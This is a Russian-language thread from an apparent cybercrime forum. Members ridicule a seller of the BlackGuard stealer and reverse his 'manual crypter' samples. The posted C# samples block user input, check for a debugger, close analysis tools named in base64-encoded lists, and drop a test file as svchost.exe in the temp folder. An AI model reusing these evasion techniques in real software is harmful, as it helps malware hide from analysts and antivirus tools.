Техническое обсуждение стилера BlackGuard

[SistemMan]

Я лично мнения каждый вправе в той или иной степени совершать ошибки, но когда человек их не признаёт и гнёт свою линию , ну бля, что тут такого признать свои ошибки, послушать адекватную критику сделать выводы, сказать спасибо за наводки и дальше работать над своим продуктом
Но опять же, не признание своих ошибок не повод для деанона в той или иной степени

 

[referral]

Я лично мнения каждый вправе в той или иной степени совершать ошибки, но когда человек их не признаёт и гнёт свою линию , ну бля, что тут такого признать свои ошибки, послушать адекватную критику сделать выводы, сказать спасибо за наводки и дальше работать над своим продуктом
Но опять же, не признание своих ошибок не повод для деанона в той или иной степени

да друг, ты прав, не повод, но когда ты как ТС не публикуешь разбор софта, а просто бегло нашел косяк, и пишешь автору софта о косяке, это ли не пентест?, это ли ни то зачем мы все тут? а он вместо благодарности чё глаголит? ты видел? "и что? заявление напиши" я лично считаю, это плевок в лицо всей площадке, это тупо неуважение к мемберам

 

[c0d3r_0f_shr0d13ng3r]

убогое говно было форкнуто с публичных проектов, которые сами по транзитивной связи не то чтобы не были убогим говном

 

[Bastar]

Дайте ему бан, очевидно что пацан-стремяга сейчас закапывает себя. Перейдет на личности, выйдет его деанон а у него семья - сынок ты сядешь за свои наработочки, думал об этом? И будешь потом сам писать треки за четкую житуху...

Один лишь вопрос...

 

[Bastar]

мне кажется твой стиллак писался под гачи версию этого трека

Вангуешь!

 

[pycckoe777]

задавили пацана уже и ответь нечего

 

[IT-user]

а зачем сливать скрины рабочего стола?!
каким бы не был ТС плохим, пустословом, обманщиком и т.д. но нельзя так делать. Семья это святое! А кто слил скрины, вот тебе, дурочку, постучать бы по голове.

 

[DildoFagins]

послушать адекватную критику сделать выводы, сказать спасибо за наводки и дальше работать над своим продуктом

Возможно, ЧерняваяКоманда - просто подвержен эффекту Даннинга-Крюгера, если вкратце и образно, то это когда низкоквалифицированный человек не в силах осознать свои ошибки в силу собственной глупости и чсв.

 

[Saiwer]

Кодер, скажи честно, ты поддерживаешь культуру АУЕ и слушаешь репера Нурминского?
Размер не важен значение имеет вес как раз про твой стиллак в 5 мегабайт

P.S гляньте на аву блектима)))

тебя это вообще не должно волновать
ауе культуру я не поддерживаю! а по поводу нурминского слушаю и что? песни у него хорошие реп без мата чел красавчик!

У него вся история в нурминском
Почему не АУФ Stealer?

Ребята, далек от мальвари, но кричу вслух. Ребята сделали моё утро. Там тип под чем вообще сообщения пишет. Его ответы похожи на ответы обиженного ребёнка из детского садика. Про нурминского это ж ещё додуматься надо было.

Дайте ему бан, очевидно что пацан-стремяга сейчас закапывает себя. Перейдет на личности, выйдет его деанон а у него семья - сынок ты сядешь за свои наработочки, думал об этом? И будешь потом сам писать треки за четкую житуху...

Один лишь вопрос...
Посмотреть вложение 35698

Хахахахаххаха, исходники нового криптолокера. Отдельно хочу сказать спасибо ребятам, кто проделали данную работу, ведь бол-во кто берёт подобный софт не вдупляют за мальварь)))

Просто не каждый день встретишь АУЕ кодера

 

[Bastar]

Хахахахаххаха, исходники нового криптолокера.

Файлы больше не шифруют, прошлый век! Вот удар пенисом....

 

[referral]

ребят, мне как рядовому внешнему пентестеру неприятно, когда ты нашел уязвимость, отписал автору, что тут и тут косяк, а он говорит, иди на завод, я не за этим физмат мгу кончал, чтоб на заводе детали сверлить, я делаю то что люблю, и люблю то что ломаю, но у нас люди видимо слишком жадны в стране, и скупой платит дважды, а автор наверное думает, дал бы эти исходники рефу, закинул бы сотки 3-4 амерских, он бы все переписал, и я бы не парился

 

[DildoFagins]

Оффтоп, конечно. Разбирал тут свою папку семплов для реверса, чтобы поудалять всякий шлак, который уже не нужен. Наткнулся на те самые семплы блектима, за которые он бил себя тапком в грудь, что они обходят все рантайм детекты. Конечно, мне по самим семплам было сразу понятно, что они никакие рантайм детекты не в состоянии обойти, но по доброте душевной все равно проверял их в рантайме на нормально настроенных антивирусах. Задача, о которой мы поспорили, состояла в том, что сбросить eicar в темп под именем svchost.exe и запустить его. В итоге самый последний семпл вызвал самую широкую улыбку, отсюда пошло множество шуток про обход рантайм детектов ёлочками и новогодним настроением. В итоге в темп записывался даже не eicar, но рантайм детект все равно обойти не получилось. В общем, берегите глаза, перед Вами элитные обходы рантайм детектов новогодним настроением (можно немножко порассуждать, что там и для чего предназначалось, я, если честно, не особо в таких элитных техниках шарю, может кто поможет разобраться?):

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace ConsoleApp4
{
    // Token: 0x02000002 RID: 2
    internal class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        public static void ytuuojhkmjholoulociIut()
        {
            try
            {
                Program.NativeMethods.sssBlockfffffInput(true);
                Thread.Sleep(2900);
            }
            finally
            {
                Program.NativeMethods.sssBlockfffffInput(false);
            }
        }

        // Token: 0x06000002 RID: 2 RVA: 0x00002088 File Offset: 0x00000288
        private static void TreeLayer(byte amount)
        {
            for (byte b = 0; b < amount; b += 1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("      0  ");
                Console.WriteLine("     010 ");
                Console.WriteLine("    00200 ");
                Console.WriteLine("   0003000 ");
                Console.WriteLine("  000040000 ");
                Console.WriteLine(" 00000500000 ");
            }
        }

        // Token: 0x06000003 RID: 3 RVA: 0x000020E5 File Offset: 0x000002E5
        private static void StarLayer()
        {
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("      0  ");
            Console.WriteLine("    00000  ");
            Console.WriteLine("     000 ");
            Console.WriteLine(" 0    %    0 ");
        }

        // Token: 0x06000004 RID: 4
        [DllImport("kernel32.dll")]
        public static extern bool FreeConsole();

        // Token: 0x06000005 RID: 5 RVA: 0x00002118 File Offset: 0x00000318
        public static void Main(string[] args)
        {
            Program.ytuuojhkmjholoulociIut();
            Thread.Sleep(1000);
            Program.FreeConsole();
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("С новым годом!\n");
            Program.StarLayer();
            Program.TreeLayer(3);
            Console.ForegroundColor = ConsoleColor.DarkYellow;
            Console.WriteLine("     000 ");
            Console.WriteLine("     000 ");
            Console.WriteLine("     000 ");
            Console.WriteLine("lddlo Worddld!");
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("lddlo Worddld!");
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("lddlo Worddld!");
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("lddlo Worddld!");
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("lddlo Worddld!");
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("lddlo Worddld!");
            Console.WriteLine("Heo Worddld!");
            Console.WriteLine("Helddlo Wodld!");
            Console.WriteLine("lddlo Worddld!");
            string s = "ΣΣΣΣΣΣΣΣΣΣΣΣΣΣΣΣΣ"; // Мысленно вставить сюда eicar, видимо.
            string text = Path.Combine(Path.GetTempPath(), "svchost.exe");
            byte[] bytes = Encoding.UTF8.GetBytes(s);
            File.WriteAllBytes(text, bytes);
            try
            {
                Process.Start(text);
            }
            catch (Exception value)
            {
                Console.WriteLine(value);
            }
        }

        // Token: 0x02000003 RID: 3
        public class NativeMethods
        {
            // Token: 0x06000007 RID: 7
            [DllImport("user32.dll", EntryPoint = "BlockInput")]
            [return: MarshalAs(UnmanagedType.Bool)]
            public static extern bool sssBlockfffffInput([MarshalAs(UnmanagedType.Bool)] bool fBlockIt);
        }
    }
}

Бонусом самый первый семпл, он не такой забавный, как последний, тоже не обходит того, чего должен. Заметен особый подчерк нашего художника: элитный ручной крипт, шифрование строк с помощью base64, хеллоу ворлды в консоль. Ничего не понятно, что это, зачем и как это должно что-то в рантайме обходить, но очень интересно (нет). В общем, если кто знает про эти элитные вещи, пишите тоже:

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace testprogram
{
    // Token: 0x02000002 RID: 2
    internal class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        public static void ghyooBlociInput()
        {
            try
            {
                Program.NativefffffffffffffffffffffffffffMethods.testin(true);
                Thread.Sleep(1200);
            }
            finally
            {
                Program.NativefffffffffffffffffffffffffffMethods.testin(false);
            }
        }

        // Token: 0x06000002 RID: 2 RVA: 0x00002088 File Offset: 0x00000288
        private static string desssssssssssssdfsdfsdcdofffde(string rtytryyutyuyjghjghjfhsyese)
        {
            return Encoding.ASCII.GetString(Convert.FromBase64String(rtytryyutyuyjghjghjfhsyese));
        }

        // Token: 0x06000003 RID: 3 RVA: 0x0000209C File Offset: 0x0000029C
        public static void Main(string[] args)
        {
            Program.ghyooBlociInput();
            Program.ODIN.ONE();
            Program.OfvbbflinexxxxxStccccyle.sdfdjjjj();
            string s = Program.desssssssssssssdfsdfsdcdofffde("WDdPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JFJBQ0lFLVNUQU5EQVJELVNJUklWSVROQS1URVNULUZJTEUhJEgrSCo=");
            string text = Path.Combine(Environment.GetEnvironmentVariable(Program.desssssssssssssdfsdfsdcdofffde("VEVNUA==")), Program.desssssssssssssdfsdfsdcdofffde("c3ZjaG9zdC5leGU="));
            Program.ODIN.ONE();
            byte[] bytes = Encoding.UTF8.GetBytes(s);
            for (int i = 0; i < 1; i++)
            {
                for (int j = 0; j < 1; j++)
                {
                    for (int k = 0; k < 1; k++)
                    {
                        for (int l = 0; l < 1; l++)
                        {
                            MessageBox.Show("Error with NInformationT : 0x{0:xxl}");
                            File.WriteAllBytes(text, bytes);
                            Program.ghyooBlociInput();
                            Program.ghyooBlociInput();
                            Program.ODIN.ONE();
                            Process.Start(text);
                        }
                    }
                }
            }
        }

        // Token: 0x04000001 RID: 1
        private static string vwsvnv = "v433.22";

        // Token: 0x04000002 RID: 2
        private static string wvvvatervvchickevn = "[...string is too long...]"; // Здесь очень длинная странная строка, не стал ее включать, дабы форумный движок пожалеть

        // Token: 0x02000003 RID: 3
        public class NativefffffffffffffffffffffffffffMethods
        {
            // Token: 0x06000006 RID: 6
            [DllImport("user32.dll", EntryPoint = "BlockInput")]
            [return: MarshalAs(UnmanagedType.Bool)]
            public static extern bool testin([MarshalAs(UnmanagedType.Bool)] bool fBlockIt);
        }

        // Token: 0x02000004 RID: 4
        public class OfvbbflinexxxxxStccccyle
        {
            // Token: 0x06000008 RID: 8 RVA: 0x0000217D File Offset: 0x0000037D
            private static string desssssssssssssdfsdfsdcdofffde(string rtytryyutyuyjghjghjfhsyese)
            {
                return Encoding.ASCII.GetString(Convert.FromBase64String(rtytryyutyuyjghjghjfhsyese));
            }

            // Token: 0x06000009 RID: 9 RVA: 0x00002190 File Offset: 0x00000390
            public static void sdfdjjjj()
            {
                for (int i = 0; i < Program.OfvbbflinexxxxxStccccyle.gggggeiergirII.Count; i++)
                {
                    int index = i;
                    for (int j = 0; j < Program.OfvbbflinexxxxxStccccyle.TxEaSdTvEDb.Count; j++)
                    {
                        int index2 = j;
                        Program.dsfsdfsdfsdffdfsdfsdfsdfvbvcbvbvcbvb.CdslofsingCdycle(Program.OfvbbflinexxxxxStccccyle.gggggeiergirII[index], Program.OfvbbflinexxxxxStccccyle.TxEaSdTvEDb[index2]);
                    }
                }
            }

            // Token: 0x04000003 RID: 3
            private static readonly List<string> gggggeiergirII = new List<string>
            {
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("aHR0cCBhbmFseXplciBzdGFuZC1hbG9uZQ=="),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("ZmlkZGxlcg=="),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("ZWZmZXRlY2ggaHR0cCBzbmlmZmVy"),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("ZmlyZXNoZWVw"),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("SUVXYXRjaCBQcm9mZXNzaW9uYWw="),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("ZHVtcGNhcA=="),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("d2lyZXNoYXJrIHBvcnRhYmxl"),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("c3lzaW50ZXJuYWxzIHRjcHZpZXc=")
            };

            // Token: 0x04000004 RID: 4
            private static readonly List<string> TxEaSdTvEDb = new List<string>
            {
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("TmV0d29ya01pbmVy"),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("TmV0d29ya1RyYWZmaWNWaWV3"),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("SFRUUE5ldHdvcmtTbmlmZmVy"),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("dGNwZHVtcA=="),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("aW50ZXJjZXB0ZXI="),
                Program.OfvbbflinexxxxxStccccyle.desssssssssssssdfsdfsdcdofffde("SW50ZXJjZXB0ZXItTkc=")
            };
        }

        // Token: 0x02000005 RID: 5
        public class dsfsdfsdfsdffdfsdfsdfsdfvbvcbvbvcbvb
        {
            // Token: 0x0600000C RID: 12 RVA: 0x000022F4 File Offset: 0x000004F4
            public static bool hbvczfS(Process zxczxfdgdfg, string uiuiVVC)
            {
                bool result;
                try
                {
                    result = zxczxfdgdfg.MainModule.FileVersionInfo.ProductName.ToLower().Equals(uiuiVVC.ToLower());
                }
                catch
                {
                    result = false;
                }
                return result;
            }

            // Token: 0x0600000D RID: 13 RVA: 0x00002340 File Offset: 0x00000540
            public static void CdslofsingCdycle(string nrrrrmes, string tereyyu)
            {
                foreach (Process process in Process.GetProcesses())
                {
                    if (Program.dsfsdfsdfsdffdfsdfsdfsdfvbvcbvbvcbvb.hbvczfS(process, nrrrrmes.ToLower()) != process.ProcessName.Contains(tereyyu))
                    {
                        try
                        {
                            Console.WriteLine("Helddlo Worddld!");
                            Console.WriteLine("Helddlo Worddld!");
                            Console.WriteLine("Helddlo Worddld!");
                            process.CloseMainWindow();
                        }
                        catch
                        {
                        }
                    }
                }
            }
        }

        // Token: 0x02000006 RID: 6
        public class ODIN
        {
            // Token: 0x0600000F RID: 15
            [DllImport("kernel32.dll", SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            private static extern bool CheckRemoteDebuggerPresent(IntPtr ProcHHandle, out bool dwReason);

            // Token: 0x06000010 RID: 16
            [DllImport("Ntdll.dll", SetLastError = true)]
            private static extern uint NtSetInformationThread(IntPtr hThread, int ThreadInformationClass, IntPtr ThreadInformation, uint ThreadInformationLength);

            // Token: 0x06000011 RID: 17
            [DllImport("Kernel32.dll", SetLastError = true)]
            private static extern IntPtr GetCurrentThread();

            // Token: 0x06000012 RID: 18 RVA: 0x000023C4 File Offset: 0x000005C4
            public static void ONE()
            {
                bool flag;
                Program.ODIN.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, out flag);
                if (flag)
                {
                    MessageBox.Show("Error with NInformationT : 0x{0:x}");
                }
            }
        }
    }
}

 

[darkman666]

Чувак спихдил панель с шары спиздил код с гита и толкал ето за 700 вечно зеленых

 

[c0d3r_0f_shr0d13ng3r]

Чувак спихдил панель с шары спиздил код с гита и толкал ето за 700 вечно зеленых

Вся проблема в том, что если мы не будем этому противодействовать(делать обзоры выпускать кряки), то форум наводнят такие кадры.

"Пока вы будете говноедами вас будут кормить говном"
Но мы ведь не говноеды?

 

[DildoFagins]

DildoFagins, у тебя вон там ручной ТРЕЩЩГЕН хеллоу ворлдами, а ты чем-то не доволен. Вполне себе элитная техника, а главное - без пресловутых мессейдж боксов!

"Я щитаю, что это крипт потому, что это качественно" (с). Кто вам еще будет ручные трешгены делать? Это вам не мусорный код, сгенерированный бездушной машиной, тут душа человеческая вложена.

 

[грибодемон]

ой какой не приятный человек, я прям не могу, хорошо что не купил

 

[Whisper]

Имена в сорце это уже лютый треш. Уже просто по именам ясно, что чел не умеет не только кодить, но и мыслить. Кстати, качественного сорца малвары я вообще не встречал. Ну так что бы имена классов четко выражали что они инкапсулируют, что бы эти классы были про что то одно, что бы функции и методы делали что то одно, что бы без меджиков, что бы с констами, что бы с вменяемой вложностью, что бы....

 

[0x5h3ll]

Имена в сорце это уже лютый треш. Уже просто по именам ясно, что чел не умеет не только кодить, но и мыслить. Кстати, качественного сорца малвары я вообще не встречал. Ну так что бы имена классов четко выражали что они инкапсулируют, что бы эти классы были про что то одно, что бы функции и методы делали что то одно, что бы без меджиков, что бы с констами, что бы с вменяемой вложностью, что бы....

ты не понимешь, это чтобы запутать реверсеров и крякеров!!! главно насрать в код и побооольше побооольше!

 

[Whisper]

ты не понимешь, это чтобы запутать реверсеров и крякеров!!! главно насрать в код и побооольше побооольше!

Вспомнился анекдот.
Приходит Винни Пух к Пятачку в гости.
Смотри а у него на стене схема разделки свиной туши.
Винни - Это еще че за херня?
Свин - А это мой портрет.
Винни - А че такой странный?
Свин - Ну понимаешь это же ХУДОЖНЕГ он так видит!

 

[DildoFagins]

Имена в сорце это уже лютый треш

Ты про фрагменты из крипта якобы с обходом рантаймов? Если да, то ты не понял, это хваленый ручной крипт, который подавался, как мега фича, которой нет у других крипторов. Типа чувачок сидит и руками прям в сорс вбивает бредятину до тех пор, пока не получит фуд. Фуда, конечно, он так и не добился ни разу, особенно в рантайме, но фича есть фича.